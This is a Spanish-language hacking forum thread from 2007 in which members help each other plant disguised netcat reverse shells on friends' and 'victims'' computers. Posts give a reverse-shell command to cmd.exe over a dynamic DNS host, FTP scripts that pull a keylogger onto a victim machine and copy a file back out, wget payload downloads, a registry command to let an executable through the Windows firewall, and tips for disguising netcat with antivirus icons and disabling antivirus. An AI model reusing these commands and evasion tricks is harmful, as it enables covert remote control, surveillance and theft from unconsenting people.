        NetBios sobre TCPIP. . . . . . .  : Deshabilitado


Fijate que en Direccion de IP y Puerta de enlace predeterminada está mi IP externa real 201.255.79.179 que es la que me sale en whatismyip.com
A demás dice algo interesante en la última línea, el estado de NetBios sobre TCPIP ;D En realidad es cosa de leerlo, porque al proncipio dice configuración de IP de Windows, esa no me interesa, las de area local tampoco a menos que tenga acceso a la red LAN a la que pertenece la persona, luego si tengo lo que me interesa...
Lo de netcat me sigue sonando raro, porque los antivirus por defecto tienen casi todos la detección de Riskware y Hacktools activada, pero no se, nunca probé con otro que no sea AVS y últimamente casi ni lo uso, lo tengo ahi apagadito...BYE!


Título: Re: Jugando con netcat
Publicado por: R41N-W4R3 en 23 Junio 2007, 13:04 pm


  A mi la parte que tienes tu de Adaptador PPP....   con toda esa info no me sale. Sabes pq puede ser???  Solo tengo la config de los ethernet conexion areal local....   

   Asia


Título: Re: Jugando con netcat
Publicado por: CrashIIX en 23 Junio 2007, 17:24 pm
Como le puedo subir cosas con el http files server, tengo ya la shell, y la ip, y todo, solo quiero saber como subirle algo con ese programa¿?


Título: Re: Jugando con netcat
Publicado por: D4RIO en 23 Junio 2007, 21:38 pm
Hola, respecto a lo de ipconfig fijate de estar poniendo ipconfig /all y no ipconfig solo.
Este es el md5 de mi ipconfig.exe en system32:

3FCA8365C8843DA4B2401347F272006E

fijate si el tuyo es el mismo, sino es porque tenes otro ipconfig, en ese caso te lo podés descargar...o copiar ;)

Con respecto a el http file server...no lo conozco bien, pero se que lo que tenes que hacer es crear la estructura de carpetas que querés compartir y despues la arrastras a la ventana del hfs...después en la máquina del otro tenés que descargar los archivos por http, o sea con el navegador, en si es lo mismo que poner los archivos en cualquier servidor web. Podés hacer que se descarguen directamente con un programita que podés hacer en VB o AutoIt, yo prefiero el último por temas de velocidad...


Título: Re: Jugando con netcat
Publicado por: WHK en 23 Junio 2007, 23:43 pm
Hola a todos nuevamente...

Citar
Como le puedo subir cosas con el http files server, tengo ya la shell, y la ip, y todo, solo quiero saber como subirle algo con ese programa¿?

Lo mostré en otros post y creo que acá también... puedes usar directamente un FTP para adjuntar el wget a tu shell y con el HFS hacer las transferencias de archivos... ¿Como se hace?... Facil mi querido watson:

Todos los windows NT tienen el comando FTP por defecto el cual sirve para transferir archivos y de eso nos aprobecharemos nosotros.

Sube y baja archivos desde tu shell

Primero bajamos el serveru que está en http://512.iespana.es/vnc

Ahora lo instalamos y copiamos los archivos "KEY.OLD" y "SERV-U.INI" dentro de "C:\Archivos de programa\Serv-U"

Luego lo abrimos y lo configuramos de la siguiente manera...

(http://www.subir-imagenes.com/imagenes/af2fccde47.gif)

Vamos a Setup/Users

(http://www.subir-imagenes.com/imagenes/79c200e5ca.gif)

1. Donde dice "username" pones tu nick (yo le puse yan)
2. Donde dice "group name" no interesa mucho asi que ponle el nombre que se te ocurra
3. Donde dice "password" ponle una contraseña para el (cualquiera, pero que no se te olvide)
4. Donde dice "Home directory" pon la ruta en donde descargarás y subiras los archivos (yo le puse mi escritorio pero si eres nuevo puedes ponerle C:\ y trabajar en esa carpeta) todo lo que subas o lo que necesites subir deve quedar en esa carpeta.
5. Donde dice "notes" ponle lo que sea.
6. Luego vamos abajo donde dice "Add" y buscamos la misma carpeta que elegimos en el paso numero 4 (home directory).
7. Ahora seleccionamos las casillas que se muestran en la imagen para que nos permita subir y bajar archivos.
8. Por último presionas en "OK"

Ufff... ahora que ya configuramos nuestro servidor FTP podemos hacer las transferencias de archivos... ¿como?... facil mi querido watson...

Desde tu shell crearemos un texto que nos permitirá ejecutar los comandos del FTP.

echo o >> ftp.txt
echo mi_ip >> ftp.txt
echo user >> ftp.txt     (Recuerda que lo vimos en el paso 1)
echo pass >> ftp.txt     (esto también lo vimos en el paso 3)
echo GET archivo >> ftp.txt
echo quit >> ftp.txt

El comando GET significa que le subirás un archivo y el comando PUT es porque le sacarás un archivo para ponerlo en tu pc. Puedes aplicar mas de uno como por ejemplo:

echo GET keylogger.exe >> ftp.txt
echo GET WinVNC4.exe >> ftp.txt
echo PUT CC.txt >> ftp.txt

Recordar que es solo un ejemplo.

Ahora ejecutamos el FTP desde mi shell de la siguiente manera: ftp.exe -s:ftp.txt y bualá!...

Hay una manera mucho mas sencilla y algo diferente...
Puedes adjuntar el wget.exe con tu netcat o bajarlo desde tu ftp. El Wget funciona de la siguiente manera:

(http://www.subir-imagenes.com/imagenes/9ed8f659f5.gif)

Como mostyré en esta imagen en el primer post.. Primero Debes abrir el HFS (es un mini servidor web que te permitirá compartir tus archivos y bajarlos con tu wget.

Descarga HFS (http://www.rejetto.com/hfs/download)
Descargar WGET (http://users.ugent.be/~bpuype/cgi-bin/fetch.pl?dl=wget/wget.exe)


Por ejemplo arrastras tu archivo hasta la ventanita del HFS y copias el link que aparece arriba y lo pegas en tu shell de la siguiente manera:

WGet.exe -c -t0 http://www.PAGINAAQUI.com/ARCHIVOAQUI.exe

y cuando presiones ENTER verás que bajaste tu archivo muy rápidamente desde tu HFS. Esto es un poco mas eficiente y rápido que usar FTP... una alternativa de muchas otras.

Nota: en el video de troyanizando RealVNC se ve como subirlo de esta manera ( http://512.iespana.es/vnc ).


Título: Re: Jugando con netcat
Publicado por: lAl en 24 Junio 2007, 02:20 am
hola... pues tengo una duda y realmente si se burlan de mi pues no importa prefiero verme tonto preguntando y no ser un tonto por no preguntar...

bueno pues puse el netcat a la escucha y lo probe en una pc de una red familiar y funciono.. pero despues le mande el archivo que cree con el winrar el .sfx a otro amigo para que lo ejecutara, puse el netcat a la escucha y nada, no se si por que me tenga que saltar el firewall o el puerto que puse no este avierto(puerto 80) pero me imagino que si por que es el que las pc tiene abierto por default ...sino pues a conseguir su ip mediante ing. inversa y hacerle una escaneada con el Nmap para ver que puertos tiene abiertos... espero me ayuden y me saquen de mis dudas... ;D


Título: Re: Jugando con netcat
Publicado por: Crwy en 24 Junio 2007, 10:11 am
Me han surgido varias dudas, 1 ene l video q me baje se ve como solo usas un arxivo llamado nc.exe, pro yo me bajao 2 el cliente y el servidor. Cual debo usar? ando perdido



Saludos  :huh: :huh:


Título: Re: Jugando con netcat
Publicado por: pitufooo en 24 Junio 2007, 12:07 pm
hola d nuevo.

por mas k lo intento NO consigo hacer k no me detecte me Norton al Netcat.

Siempre k lo subo al pc victima salta noirton y m lo borra al tiempo k saca su mensajito de se ha encontrado un virus.

He probado haciendo lo del primer post , pero no me sale siempre me pilla norton, tambien he probado con panda y mas d lo mismo.

Por favor podriais enseñarme como hacerlo indetectable.

muchas gracias

un saludo

PD  hay alguna otra forma de conseguir una shell  remota ??


Título: Re: Jugando con netcat
Publicado por: carlipus en 25 Junio 2007, 19:22 pm
Buenas, he conseguido una shell, y por ftp le he subido los 4 archivos que pone en el manual para conectar por Winvnc, peroo hay una cosa que no entiendo. y es cuando pongo at "la hora" /interactive "qttask.exe"

Una vez pasa la hora y pongo el comando at para ver si ya no hay entradas, sigue estando la entrada esa que puse, por que?  Espero haberme explicado bien, y si nos lo intento explicar mejor.

si pongo tasklist me sale el qttask.exe pero voy al cliente de winvnc. pongo la ip, y me pone: Invalid VNC server specified. Server should be of the form host:display

Saludos.


Título: Re: Jugando con netcat
Publicado por: carlipus en 26 Junio 2007, 14:40 pm
Hola de nuevo, he conseguido shell de nuevo de un amigo y le hize todos los pasos para subirle vnc, incluido los comandos AT tambien bien. pero cuando voy a abrir el vnc me pone siempre el mismo error-> Invalid VNC server specified. Server should be of the form host:display

no tiene router, pero nose xq me pone eso!


Y otra cosa que intento es meterle el troyano prorat, pero el antivirus me lo elimina...y no pudo quitar el nod32 con tasskill!

saludos


Título: Re: Jugando con netcat
Publicado por: nitratus en 26 Junio 2007, 21:38 pm
Además de los puertos 80, 21 y 25 que otros puertos no son detectados por el firewall?. y nos pueden ser de utlidad?


Título: Re: Jugando con netcat
Publicado por: lAl en 27 Junio 2007, 00:06 am
pues hermano hay te va una listita de los puertos para que busques..

http://es.wikipedia.org/wiki/Anexo:Lista_de_n%C3%BAmeros_de_puerto

te recomiendo que bajes el Nmap y des una escaneada a la dirección que quieras e inclusive una pagina de internet(es lo mismo pones la ip nada más que en letritas jajajaja).. y una vez echo te arroje que puertos esta utilizando y tiene abiertos..

saludos... jojojojojo


Título: Re: Jugando con netcat
Publicado por: WHK en 27 Junio 2007, 02:03 am
Hola nuevamente...

Citar
no se si por que me tenga que saltar el firewall o el puerto que puse no este avierto(puerto 80) pero me imagino que si por que es el que las pc tiene abierto por default

Hay antivirus que te impiden usar el netcat..ojo.. otra cosa puede ser que tu no puedas ponerte de servidor ya que es una red familiar y para eso necesitas abrir el puerto a utilizar desde tu router, si el router no es tuyo entonces pideles permiso para que te abran uno solo (ingeniatelas por ejemplo el puerto 80 sería genial o el 21).

Citar
Me han surgido varias dudas, 1 ene l video q me baje se ve como solo usas un arxivo llamado nc.exe, pro yo me bajao 2 el cliente y el servidor. Cual debo usar? ando perdido

Ese del cliente y el servidor es un proyecto... el que debes bajar es el netcat simple:
http://www.vulnwatch.org/netcat/nc111nt.zip
Usa nc.exe

Citar
Por favor podriais enseñarme como hacerlo indetectable.
jajaa si les digo como se las pasarían de traviesos  :P... usen algún AVFuck o metodos para detener el antivirus y despues descomprimir el netcat.. por ejemplo... en un archivo rar sfx meten dos archivos... uno con el netcat y otro con el avfuck... primero se detiene el antivirus y cuando reinicie sale a la batalla el netcat  ;D pueden usar joiners indetectables como el de mad antrax.

Citar
Invalid VNC server specified. Server should be of the form host:display
Mira esto:
http://www.realvnc.com/pipermail/vnc-list/2001-May/022536.html
Acá dice que no resuelve tu IP ... talves no puede4s ponerte de servidor ya sea por el antivirus, cortafuegos, configuración de router, etc etc.

Citar
at "la hora" /interactive "qttask.exe"
Solo pon at "hora" "ejecutable -variables"

Citar
no pudo quitar el nod32 con tasskill
No puedes detener antivirus ni nada de eso con tskill ni tasskill.

Intenten ejecutar el VNC sin el comando AT... o sea...
VNC -register
VNC -start
VNC -connect mi ip

Si lo haces desde tu shell la otra persona no verá nada.

Citar
Además de los puertos 80, 21 y 25 que otros puertos no son detectados por el firewall?. y nos pueden ser de utlidad?
Puedes detener el firewall mejor y de esa manera tienes todos los puertos libres que quieras  :P

reg add HKLM\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\ /v "ejecutable" /t reg_sz /d "ejecutable:*:Enabled:ejecutable" /f

Ojala les sirva a todos... cualquier duda busquen primero y si no está entonces pregunten y con mucho gusto yo o el que quiera aportar podremos ayudarles  ;)


Título: Re: Jugando con netcat
Publicado por: carlipus en 27 Junio 2007, 10:50 am
WHK ejecuto eso desde mi shell? no pasa nada, no me conecta

Pongo en mi shell:
winvnc -register
Winvnc -start
Winvnc -connect su ip

y si lo hago desde la shell de la victima nada tampoco, no lo entendi muy bien.

Saludos


Título: Re: Jugando con netcat
Publicado por: Crwy en 27 Junio 2007, 11:04 am

Citar
Me han surgido varias dudas, 1 ene l video q me baje se ve como solo usas un arxivo llamado nc.exe, pro yo me bajao 2 el cliente y el servidor. Cual debo usar? ando perdido

Ese del cliente y el servidor es un proyecto... el que debes bajar es el netcat simple:
http://www.vulnwatch.org/netcat/nc111nt.zip
Usa nc.exe


Gracias man, ya me lo descargao ara voy ha hacer la prueba. ;)


Saludos  ;D ;D


Título: Re: Jugando con netcat
Publicado por: Alvaro_TheMaster en 5 Julio 2007, 14:06 pm
ola, pues mi problema es el siguiente:

yo creo el archivo sfx del nc y lo pongo todo como sale en el tutorial y pongo mi ip publica. se lo mado a uno por el msn y le digo k lo ejecute, pongo el cmd en escucha del puerto 80 pero no m llega ninguna señal y la persona del msn dice k lo a ejecutado. cuando me lo ejecuto  ami mismo si slae pero pork cuando se lo paso no?????

saludos y espero k alguien me responda


Título: Re: Jugando con netcat
Publicado por: ReVoX en 6 Julio 2007, 18:43 pm
Me ha surgido un problema, ya lo tengo todo creado y bien, pero cuando intento escuchar al .exe me da un error:
Código:
C:\Documents and Settings\ReVoX>chdir C:\Windows (Para entrar en C:\Windows, no se si es necesario, pero yo lo hice)

C:\WINDOWS>nc -vv -L -p 80
"nc" no se reconoce como un comando interno o externo
programa o archivo por lotes ejecutable.



Título: Re: Jugando con netcat
Publicado por: WHK en 8 Julio 2007, 06:42 am
Citar
"nc" no se reconoce como un comando interno o externo
programa o archivo por lotes ejecutable.

Primero que nada Hola... buenas noches a todos.

No te reconoce el netcat porque no lo tienes o simpelemnte porque tu antivirus lo ha bloqueado o borrado. Fijate bien en las opciones de tu antivirus y añadelo a la lista de excluidos.
De todas formas baja el netcat y luego abre el explorador de Windows, en la parte de arriba donde muestra la ruta escribe %windir%\system32 y en ese lugar pon tu netcat con el nombre de nc.exe

Citar
yo creo el archivo sfx del nc y lo pongo todo como sale en el tutorial y pongo mi ip publica. se lo mado a uno por el msn y le digo k lo ejecute, pongo el cmd en escucha del puerto 80 pero no m llega ninguna señal y la persona del msn dice k lo a ejecutado. cuando me lo ejecuto  ami mismo si slae pero pork cuando se lo paso no?????

Eso puede ser porque no estas escuchando atraves de tus puertos publicamente. Me explico.

Yo tengo dos IP... una interna la cual me veo yo y los que estan dentro de mi casa como por ejemplo 192.168.xx.xx, ahora mi ip pública no deve contener esos números. Tu ip pública está acá:
http://ip.interchile.com/
Recuerda que si vas a escuchar atraves del puerto 80 Debes abrir tu puerto 80 (solo los que usan router a exepción de los que usan telefónica) y con todo esto devería resultar todo muy bien.

Si dices que tu puedes verte pero con tu amigo no te resulta es porque le diste la ip equibocada o tus puertos se encuentran cerrados.

Prueva de conectividad:

1. Ver ti IP acá -> http://ip.interchile.com/
2. Ejecutar nc -L -p 80 -vv
3. Ejecutar nc IP 80 (Donde dice IP le pones la que te apareció en interchile)
4. Si puedes ver que se conecta bien es porque tienes tus puertos abiertos.
Si no puedes realizar la conexión es porque simplemente no puedes escuchar como servidor a menos que uses los puertos por defecto de todas las compañias de internet y telefonía tales como telefonica y VTR... estos puertos son el 5101 (Usado para Yahoo Messenger) y el 1863 (Usadop para el MSN Messenger). Lo he visto yo mismo... el 90% de mis amigos que tienen una conexión con sus puertod limitados tienen estos abiertos por defecto para que no les reclamen cuando quieran chatear  :P


Bueno... voy a crear varios Netcat con su Icono cambiado para que ya no tengan mas problemas.

Estoy compilando unos programas que les ayudaran a ocultar netcat dentro de otro ejecutable y cuando se abra ese no lanze el pantallazo de DOS.
Otras opciones para autoarranque de diversas formas, Elevación de permisos con diferentes exploits para Sistemas operativos Objetivos, Uso automatizado del comando AT yReg, Entre otras cosas mas, dentro de unos dias.

PD: Código fuente totalemente abierto (Open Source).


Título: Re: Jugando con netcat
Publicado por: Alvaro_TheMaster en 8 Julio 2007, 16:59 pm
muxas gracias


Título: Re: Jugando con netcat
Publicado por: perseus68 en 8 Julio 2007, 19:36 pm
Soy muy novato.... :-(
La verdad es que aqui´hay gente con 2 coj..es .....pero enormes  :o
Enhorabuena.Me lo leo con calma a ver si aprendo algo.

Un saludo
M.


Título: Re: Jugando con netcat
Publicado por: WHK en 8 Julio 2007, 21:39 pm
Bajalo desde acá:
http://www.vulnwatch.org/netcat/nc111nt.zip
Sacas el exe y lo usas. Si todavía sigue diciendo lo mismo es por culpa de tu antivirus.

He visto porque a muchos les daba error al tratar de cambiar el ícono... lo que pasa es que Netcat 1.1 no puede ser modificado :p y yo estaba usando el 1.0 que si puede serlo.

Estoy creando un espacio para descargar las distintas versiones del netcat mas otros con sus iconos ya cambiados listos para ser usados... denme unos dias para terminar todo con calma.


Título: Re: Jugando con netcat
Publicado por: Ze Marduk en 10 Julio 2007, 09:03 am
caracoleesss!!! q puedo decir simplemente estoy facinado con este foro todos paracen ser excelentes compañeros comparten todo y ayudan a todos... desde hace tiempo me interese x el hacking pero no tenia muchos conocimientos mas q abrir office y el msn jeje pero ahora estudio ing en computacion y sistemas y tengo los conocimientos basicos y entiendo la mayoria d lo q aki se expone, incluso programo en C y en visual basic... espero poder aprender mucho d ustedes y pues d mi parte en lo poco q pueda ayudar pues asi sera, felicidadess!!! empezare con jugando con netcat 1 jeje espero q me salga...

x cierto entonces q paso? se le puede cambiar el icono al nc1.1 o solo al 1.0??
saludos


Título: Re: Jugando con netcat
Publicado por: Ze Marduk en 11 Julio 2007, 01:25 am
hola d nuevo yo:D JUGANDO CON NETCAT V1.1 PARTE 1 me ha funcionado solo con un pc q tengo en red local pero cuando lo paso a alguien atravez d internet se keda en listening [any] 80

y JUGANDO CON NETCAT V1.1 PARTE 2 no me funciona para cuentas hotmail imagino q esto es debido a la seguridad q manejan ellos pero puede haber forma d forzar a enviar el correo a una cuenta hotmail??


Título: Re: Jugando con netcat
Publicado por: @ron en 12 Julio 2007, 20:31 pm
esta muy chido lo q pusistes, no lo e probado pero se q me alludarara asaber mas y repasar lo q ya se

felicidades!!


Título: Re: Jugando con netcat
Publicado por: IWKY en 12 Julio 2007, 21:06 pm
Buenas, haga la 1º parte la envio a la victima, en foma de imagenes, me confirma que ha ejecutado toas las imagenes osea tambien el netcat y  a mi no se me conecta, por que puede ser?


Título: Re: Jugando con netcat
Publicado por: WHK en 13 Julio 2007, 00:15 am
Citar
x cierto entonces q paso? se le puede cambiar el icono al nc1.1 o solo al 1.0??
Exactamente, desde la version 1.1 ya no puede cambiarse el ícono, de todas formas adjunté el netcat con muchos íconos cambiados en http://whk.yethost.com/  ;D cambiamos de web  :P También puedes cambiarselo ustedes mismos con el Resource Hacker.

Citar
hola d nuevo yo:D JUGANDO CON NETCAT V1.1 PARTE 1 me ha funcionado solo con un pc q tengo en red local pero cuando lo paso a alguien atravez d internet se keda en listening [any] 80
Lo mas probable es que no le enviaste tu ip pública... recuerda que puedes verla desde acá:
http://ip.interchile.com/
Si todavía no puedes, entonces verifica tus puertos que esten abiertos.
Verifica tu firewall o tu antivirus si no ha bloqueado al netcat tuyo.

Citar
y JUGANDO CON NETCAT V1.1 PARTE 2 no me funciona para cuentas hotmail imagino q esto es debido a la seguridad q manejan ellos pero puede haber forma d forzar a enviar el correo a una cuenta hotmail??
Curiosamente despues de crear los primeros post de jugando con netcat agregaron a su lista negra los miniremailers y prohibieron el ingreso de correos externos sin previo aviso del dueño del servidor asi como yahoo o google  :P de todas formas en yahoo todavía funciona.

Citar
Buenas, haga la 1º parte la envio a la victima, en foma de imagenes, me confirma que ha ejecutado toas las imagenes osea tambien el netcat y  a mi no se me conecta, por que puede ser?
Verifica un poco mas atras en estos mismos post de algunas personas que no podian hacerlo y lo han resuelto... pueden ser muchas cosas, sacalas por descarte.


Título: Re: Jugando con netcat
Publicado por: Alvaro_TheMaster en 13 Julio 2007, 00:40 am
pues yo si puedo modificar el nc 1.1 y me va de lujo, k raro xDDD

saludos


Título: Re: Jugando con netcat
Publicado por: Ze Marduk en 13 Julio 2007, 02:26 am
jaja si... io tambien pude cambiarle el icono al NC v1.1, le puse un icono d norton antivirus jejeje, tmb tengo iconos d NOD32 y Kaspersky jaja para q las victimas no sospechen jojojo


Título: Re: Jugando con netcat parte 2
Publicado por: @ron en 16 Julio 2007, 05:19 am
probe el enviar los mails anonimos y me funciono, pero a la hora de responderlos no funciona, ahi alguna forma de que me respondan y que yo pueda ver los mensajes q me envian, me imagino q en el MiniRelay tengo q cambiar el puerto pero no se cual, cual es si esq es asi??. y q mas podria hacer??, o es practicamnete inposible poder aserlo??


Título: Re: Jugando con netcat
Publicado por: donottrustno01 en 16 Julio 2007, 05:38 am
Muy weno, a probar y probar xD   :)


Título: Re: Jugando con netcat
Publicado por: WHK en 16 Julio 2007, 05:47 am
Citar
probe el enviar los mails anonimos y me funciono, pero a la hora de responderlos no funciona, ahi alguna forma de que me respondan y que yo pueda ver los mensajes q me envian, me imagino q en el MiniRelay tengo q cambiar el puerto pero no se cual, cual es si esq es asi??. y q mas podria hacer??, o es practicamnete inposible poder aserlo??

Enviar un correo con Netcat y el Miniremailer haces que sea anonimo asi que proviene de cualquier persona o lugar, por lo tanto no puedes recibirlos a menos que lo hagas con una cuenta real, por ejemplo enviarlo departe de micuetna@hotmail.com... cuando te respondan te llegará a tu hotmail. Entiendes?


Título: Re: Jugando con netcat
Publicado por: Ze Marduk en 16 Julio 2007, 07:20 am
asi es donottrustno01 no t pueden contestar a un correo q no existe,  ;D


Título: Re: Jugando con netcat
Publicado por: @ron en 16 Julio 2007, 21:16 pm
Enviar un correo con Netcat y el Miniremailer haces que sea anonimo asi que proviene de cualquier persona o lugar, por lo tanto no puedes recibirlos a menos que lo hagas con una cuenta real, por ejemplo enviarlo departe de micuetna@hotmail.com... cuando te respondan te llegará a tu hotmail. Entiendes?
si isiera un servidor de corre electronico y q ahi mismo creara mi propia cuenta de correo(ejemplo:pendejadas@mimail.com), entonces si podrian responder  a mis mails y por una parte serian anonimos ps yo seria el unico q conoseria eso, pero q nececitaria paara poder hacer algo asi??

ojala me alla podido explicar!!


Título: Re: Jugando con netcat
Publicado por: Ze Marduk en 16 Julio 2007, 22:51 pm
mas o menos t refieres a hacer tu propia web p.e:  www.aron.com y ahi mismo crear una cuenta d correo?? pues podria ser pero necesitas hosting y q ademas t den cuentas d correo y eso cuesta...


Título: Re: Jugando con netcat
Publicado por: @ron en 17 Julio 2007, 23:04 pm
mas o menos t refieres a hacer tu propia web p.e:  www.aron.com y ahi mismo crear una cuenta d correo?? pues podria ser pero necesitas hosting y q ademas t den cuentas d correo y eso cuesta...

gracias por la informacion


Título: Re: Jugando con netcat
Publicado por: D4RIO en 18 Julio 2007, 01:12 am
Hay servidores de correo personales, no es necesario hacerse una web antes, aunque bien podrías usar un reflector XD

Proba por ejemplo AGSMAIL...

Lo del reflector es simple, puede ser en dot.tk, registras un dominio fidodido.tk y haces un reflector para que cuando te manden mails a holalola@fidodido.tk te llegun a juancito@hotmail.com

Eso por ejemplo, claro...XD

BYE! espero te sirva el agsMail


Título: Re: Jugando con netcat
Publicado por: HALC12 en 25 Julio 2007, 19:58 pm
intente troyanizar el netcat y me sale este error nc.exe: el archivo tiene un formato desconocido o esta dañado


Título: Re: Jugando con netcat
Publicado por: HALC12 en 27 Julio 2007, 01:10 am
hola
haber si me ayudan mando el netcat troyanizado y no se conecta a mi pc
he hecho las pruevas en una red lan y no funciona
y lo hago manualmente  y si funciona es decir abro el netcat en los dos equipos
espero que me entiendan
 


Título: Re: Jugando con netcat
Publicado por: josezcito en 27 Julio 2007, 02:34 am
una duda
soy nuevo en esto y me sale este error

h_errno 11001: HOST_NOT_FOUND

como lo soluciono, pork creo k ya habian respondido a esta misma inquietud
pero no capto la idea de la solucion del problema
jeje sorry

ojala se tomen el tiempo para responder bye


Título: Re: Jugando con netcat
Publicado por: sokra en 27 Julio 2007, 05:51 am
Hola estuve practicando (mas bien aprendiendo) del primer volumen y me dió resultado pero tengo un par de preguntas y komentarios :

- Lo hice a modo de prueba kon un amigo, sin kambiar el icono de nc porke al kambiarlo me mandaba el error de "aplicacion system32 no valida" o algo así, pero haciendo todo lo demás. De esta manera funcionó.

- ¿Porke pude hacer una konexion inversa, si la direccion que puse es la de mi router (o publica), komo se redireccionó la conexion hacia mi pc en particular? (stoi en una LAN).

-Aunke en principio funcionó bien, al pedirle a mi amigo que reiniciara su pc no se konektó automatikamente, porke puede pasar esto? (kopié los comandos tal cual).

Agradecería mucho su ayuda.


Título: Re: Jugando con netcat
Publicado por: HALC12 en 27 Julio 2007, 15:51 pm
HOLA
he estado haciendo pruebas y he seguido todos los pasos que dicen en la pagina 1 para troyanizar el nc ppero no me funciona.
me explico a lo que lo abro la ya comprimido me sale un panatallaso del dos
bueno de tanto intentar ver que era lo que decia lo consigue dice que el programa es de masiado extenso para colocarlo en memoria
les agradeceria si saca un tiempito para ayudarme


Título: Re: Jugando con netcat
Publicado por: Martín Fierro en 27 Julio 2007, 19:04 pm
hazlo a mano, no es gran cosa lo que hizo el compañero es diseñar un programa de lo que se puede hacer a mano...

Si bajaste el programa has de tener en tu carpeta los programas necesarios para hacerlo...

Lo que hizo fue empaquetarlo con el winrar de línea de comandos, tu puedes hacerlo con tu winrar normal checa los comandos que usa...

hay en el foro un montón de joiners que te harán lo que pides con el nc o con el programa que quieras..

Intentalo un poco más, no te desesperes, puedo decirte que vas bien..

en realidad el manejo de nc es sencillo, pero es complicado tomarle el hilo...


Título: Re: Jugando con netcat
Publicado por: elyokko en 28 Julio 2007, 21:41 pm
joder k lammerrrrr eres amigo eso de borrar datos  xDD


SPIAR TODA BIA NO HAY PEX PERO BORRAR DATOS ERES LAMMER AMIGO Y PARA ACABARA ERES ORGULLOSAMENTE LAMMERRRRRR


Título: Re: Jugando con netcat
Publicado por: Ragdead en 30 Julio 2007, 01:06 am
oyee que bonito aportee aunke yo no soy muy malvadoo a lo mas le lleno el escritorio de basura o le abro el CD-ROM yaa al extremo un shutdown xD pero nada mas

bueno saludos y me gusto muxo este post

aa paso de presentarme soy nuevoo muxo gusto a todos


Ragdead


Título: Re: Jugando con netcat
Publicado por: Esquipy en 3 Agosto 2007, 01:37 am
Excelente Felicitaciones de Todo corazon, eres muy bueno en esto ;)

Salu2
-- Esquipy --


Título: Re: Jugando con netcat
Publicado por: @ron en 5 Agosto 2007, 21:45 pm
esta my bueno el post pero, quiero poner netcat a la escucha en una pc dentro de una lan y q tiene ip estatica, pero aclaro a la escucha, si desde fuera de la lan yo intentara acceder a esa pc dentro de la lan conociendo su direccion ip pero de la pc q esta dentro de la lan, creo yo q no se podria acceder ps esa direccion ip puede estar duplicada dentro de la gran red "internet" entonces q podria hacer??

podria poner la direccion ip del router y despues acceder a la pc dentro de la lan pero creo q de esa forma no funcionaria, y asiq tendria mejor q hacer q la pc se conectara a una ip osea la mia, pero yo quiero ponerla a la escucha para q desde cualquier conpu me conectara a esa pc.  como podria hacerlo??

espero q me alla podido eplicar bien y ojala me contesten rapido


Título: Re: Jugando con netcat
Publicado por: D4RIO en 6 Agosto 2007, 08:22 am
Hola, no podes conectarte a una PC que este a la escucha y tomarle la shell asi como asi, es decir, es necesario que esa PC se conecte a la tuya con el paramentro -e establecido, (en Linux podria ser -c)...Lo que podes hacer es hacerte una cuenta en NO-IP y usar tu DNS desde cualquier PC. Así no importa desde dónde te conectes, la máquina siempre se intentaría conectar a tu DNS y por lo tanto tendrías éxito desde cualquier PC.


Título: Re: Jugando con netcat
Publicado por: @ron en 6 Agosto 2007, 23:52 pm
Hola, no podes conectarte a una PC que este a la escucha y tomarle la shell asi como asi, es decir, es necesario que esa PC se conecte a la tuya con el paramentro -e establecido, (en Linux podria ser -c)...Lo que podes hacer es hacerte una cuenta en NO-IP y usar tu DNS desde cualquier PC. Así no importa desde dónde te conectes, la máquina siempre se intentaría conectar a tu DNS y por lo tanto tendrías éxito desde cualquier PC.

se intentará conectar a mi DNS pero la q ise con no-ip o se conectara con la no-ip de la compu donde abra mi no-ip ya instalado??

y entonces despues de eso pongo NetCat a la escucha y la compu se conectara a la mia??

quisiera abrir dos puertos en la pc victima pero como tendria q ponerlo en el registro (regedit), asi para poder enviar archivos y eso??

no entiendo muy bien como esq se conecta a mi no-ip, algunas veces tienes una ip y despues la puedes actualizar a la q tiene actualmente la pc pero eso no proboca ningun daño a la hora de usar la DNS para hacer una shell??

y si no es mucha molestia me podias explicar un poco el como funciona la no-ip a la hora de usarla ps aunq e leido del tema no lo entiendo pero lo puedo hacer y no es suficiente para mi!!

gracias y ojala me des una solucion


Título: Re: Jugando con netcat
Publicado por: profesional en 7 Agosto 2007, 14:35 pm
Buenas,

No se pueden ver las imagenes del post inicial :(


Título: Re: Jugando con netcat
Publicado por: D4RIO en 11 Agosto 2007, 20:41 pm
Respondiendo a @ron:
no-ip.org es un servicio de DNS. Eso significa que es un proveedor de nombres de dominio. Vos tenes una cuenta en no-ip y ellos asocian tu última IP a un nombre de subdominio que es por ejemplo, en mi caso, darioweb.no-ip.org.

El servicio funciona por dos partes. El servidor que provee el servicio de DNS y el cliente, o sea vos. Tu programa cliente de no-ip provee al servidor de tu última IP para que así ese subdominio DNS se asigne a ella. Así para cualquier cosa que necesites tu IP podés usar el DNS, sea un servidor web o tomar una shell.

Entonces si instalas el cliente de no-ip en otra PC y accedes los datos de tu cuenta de no-ip la IP a la que se asignará el DNS será la de la otra PC. Así es que podés usar cualquier PC para tomar una misma shell.

Y si querés hacer una conexión para ambos lados????  Es simple. Usas netcat para mandarte el IP de la otra persona por E-Mail !!!!!!  XD


Título: Re: Jugando con netcat
Publicado por: @ron en 13 Agosto 2007, 05:20 am
Respondiendo a @ron:
no-ip.org es un servicio de DNS. Eso significa que es un proveedor de nombres de dominio. Vos tenes una cuenta en no-ip y ellos asocian tu última IP a un nombre de subdominio que es por ejemplo, en mi caso, darioweb.no-ip.org.

El servicio funciona por dos partes. El servidor que provee el servicio de DNS y el cliente, o sea vos. Tu programa cliente de no-ip provee al servidor de tu última IP para que así ese subdominio DNS se asigne a ella. Así para cualquier cosa que necesites tu IP podés usar el DNS, sea un servidor web o tomar una shell.

Entonces si instalas el cliente de no-ip en otra PC y accedes los datos de tu cuenta de no-ip la IP a la que se asignará el DNS será la de la otra PC. Así es que podés usar cualquier PC para tomar una misma shell.

Y si querés hacer una conexión para ambos lados????  Es simple. Usas netcat para mandarte el IP de la otra persona por E-Mail !!!!!!  XD


y puedo poner en el regisro, q netcat se conecte a un direccion dns, como lo pondria?? y yo solo tendria q poner netcat a la escucha y abrir mi no-ip cambiar la direccion ip de mi duc mas reciente q seria de la q estaria usando actualmente y se conectaria, y ya esta y funcionaria??


Título: Re: Jugando con netcat
Publicado por: D4RIO en 13 Agosto 2007, 23:14 pm
A ver, en el equipo remoto ponés la conexión a tu máquina con

nc -d -e cmd.exe tu.dns 80

Y en tu máquina escuchas en el ochenta very verbose así:

nc -vv -L -p 80

